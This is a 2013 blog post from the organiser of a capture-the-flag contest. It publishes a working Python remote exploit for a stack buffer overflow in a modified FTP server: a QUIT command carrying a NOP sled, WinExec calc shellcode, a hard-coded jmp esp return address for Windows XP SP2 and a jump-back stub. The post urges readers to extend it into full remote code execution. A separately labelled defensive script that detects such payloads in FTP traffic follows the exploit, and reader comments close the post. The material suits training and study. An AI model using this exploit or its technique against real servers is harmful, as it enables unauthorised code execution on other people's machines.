Monday, June 17, 2013

IDSECCONF 2013 ctf offline: exploitation challenge (500) exploit

This is the exploit code for the stack-based buffer overflow in myftpd (the 500-point exploitation challenge) from the IDSECCONF offline CTF. None of the teams managed to put together a working remote exploit, although one team did find the correct offset to overwrite EIP. That alone earned no points; a team would have scored by demonstrating code execution, for example by calling WinExec to launch calc, even without getting the remote shell.

For all the teams that played yesterday: you can use this skeleton exploit (it only carries the calc payload) to build your own remote-code-execution exploit and retrieve flag.txt from the Desktop directory inside the Windows VM you were given a copy of.

As for the hint, it is still the same: you have a very limited character set (many bad chars) and limited space, so your best bet is to craft your own shellcode. Good luck and enjoy!

#!/usr/bin/env python

from socket import *
import sys
from time import sleep


if len(sys.argv) != 3:
    print "[-]Usage: python %s <ip> <port>" % sys.argv[0]
    sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])

#winexec calc taken from : http://code.google.com/p/win-exec-calc-shellcode/
shellcode=("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7\xCC")

#jmp esp 7c941eed win xp pro sp 2

payload  ="\x90"*50+shellcode+"\x90"*(234-len(shellcode))+"\xed\x1e\x94\x7c"
payload +="\x90"*14
#let's use kewl way to jump back 256 using ecx
payload +="\x33\xc9" #XOR ECX,ECX
payload +="\x54" #PUSH ESP
payload +="\x59" #POP ECX
payload +="\xfe\xcd" #DEC CH, jumpback 256 \m/
payload +="\xff\xe1" #JMP ECX

print "[+]Connecting with server..."
sleep(1)

try:
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))
    s.recv(1024)
    s.send("USER test\r\n")
    s.recv(1024)
    s.send("PASS test\r\n")
    s.recv(1024)
    s.send("QUIT "+payload+"\r\n")
    s.close()
    print "[+]Exploit Success!"
except:
    print "[*]Exploit Failed, Cannot connect to server: "+ip
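From the defender's side, the payload above has a recognisable shape on the wire: a QUIT command (which takes no argument) carrying a few hundred bytes, most of them 0x90 NOPs and other non-printable bytes. The following Python 3 script is an added example, not part of the original post, that scans raw FTP command lines for that shape; the thresholds, the rule names and the sample traffic are my own assumptions and constructions, not values taken from the challenge binary.

```python
#!/usr/bin/env python3
# Added example: flag FTP command lines whose argument looks like an overflow
# attempt of the kind sent above. Thresholds are assumptions for illustration.

MAX_ARG_LEN = 128        # assumed: legitimate FTP arguments rarely exceed this
NOP_RUN = b"\x90" * 16   # assumed: 16 consecutive NOPs counts as a sled
NONPRINT_RATIO = 0.25    # assumed: more than 25% non-printable bytes is suspect

# Constructed sample traffic: three benign commands and one QUIT carrying a
# NOP sled, a few shellcode-like bytes, more NOPs and a little-endian address.
SAMPLE_LINES = [
    b"USER test\r\n",
    b"PASS test\r\n",
    b"QUIT " + b"\x90" * 50 + b"\x31\xd2\x52" + b"\x90" * 200
             + b"\xed\x1e\x94\x7c" + b"\r\n",
    b"RETR report.pdf\r\n",
]


def analyse_command(line):
    """Return (verb, reasons) for one raw FTP command line.

    An empty reasons list means nothing about the line looked suspicious.
    """
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_ARG_LEN))
    if NOP_RUN in arg:
        reasons.append("run of >=16 NOP (0x90) bytes")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if arg and nonprint / len(arg) > NONPRINT_RATIO:
        reasons.append("%d%% non-printable bytes" % (100 * nonprint // len(arg)))
    if verb == b"QUIT" and arg:
        reasons.append("QUIT with an argument (QUIT takes none)")
    return verb.decode("ascii", "replace"), reasons


def scan(lines):
    """Return [(verb, reasons)] for every line that triggers at least one rule."""
    hits = []
    for line in lines:
        verb, reasons = analyse_command(line)
        if reasons:
            hits.append((verb, reasons))
    return hits


if __name__ == "__main__":
    for verb, reasons in scan(SAMPLE_LINES):
        print("[!] %s: %s" % (verb, "; ".join(reasons)))
```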

Update: OJ has written an excellent write-up about this challenge here, thanks mate.


6 comments:

  1. @Vnspl0it: Hi, you're welcome :)

  2. Are the binaries available for download? I wouldn't mind attempting this myself.

  3. @OJ: hi, it's actually a modified version of "some" FTP server, feel free to get it and try it from here https://www.dropbox.com/sh/cldqxp2kxcitfyv/LL5SWQxmvg, can't wait for your write-up :)

  4. Hey Ammar,

    Can you please email me on oj@buffered.io ? :) I'd like to share my exploit with you. Write up coming soon.

    OJ

  5. @OJ: that's a very nice write-up and exploit, thanks mate.
